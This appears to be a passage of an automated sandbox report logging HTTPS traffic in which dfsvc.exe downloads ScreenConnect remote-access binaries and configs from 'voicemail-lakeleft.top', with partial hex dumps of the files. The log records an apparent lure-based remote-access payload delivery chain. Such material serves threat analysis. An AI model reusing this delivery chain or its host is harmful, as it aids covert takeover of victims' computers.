                                                                                                                                                                                                                                                  Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
                                                                                                                                                                                                                                                  2024-11-08 10:01:15 UTC12280INData Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31
                                                                                                                                                                                                                                                  Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.549726194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:16 UTC142OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:16 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 266
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:16 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:16 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.549728194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:17 UTC137OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:17 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 266
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:17 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:17 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.549731194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:18 UTC145OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:19 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 266
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:19 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:19 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.549736194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:20 UTC135OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:20 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 81696
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:20 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:20 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                                                                                                  2024-11-08 10:01:20 UTC16384INData Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34
                                                                                                                                                                                                                                                  Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                  2024-11-08 10:01:20 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff
                                                                                                                                                                                                                                                  Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                  2024-11-08 10:01:21 UTC16384INData Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                  2024-11-08 10:01:21 UTC16376INData Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: n


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.549743194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:21 UTC123OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 197120
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:21 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC16384INData Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a
                                                                                                                                                                                                                                                  Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC16384INData Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc
                                                                                                                                                                                                                                                  Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC16384INData Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f
                                                                                                                                                                                                                                                  Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC16384INData Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00
                                                                                                                                                                                                                                                  Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                  2024-11-08 10:01:22 UTC16384INData Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15
                                                                                                                                                                                                                                                  Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
                                                                                                                                                                                                                                                  2024-11-08 10:01:23 UTC16384INData Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74
                                                                                                                                                                                                                                                  Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
                                                                                                                                                                                                                                                  2024-11-08 10:01:23 UTC16384INData Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76
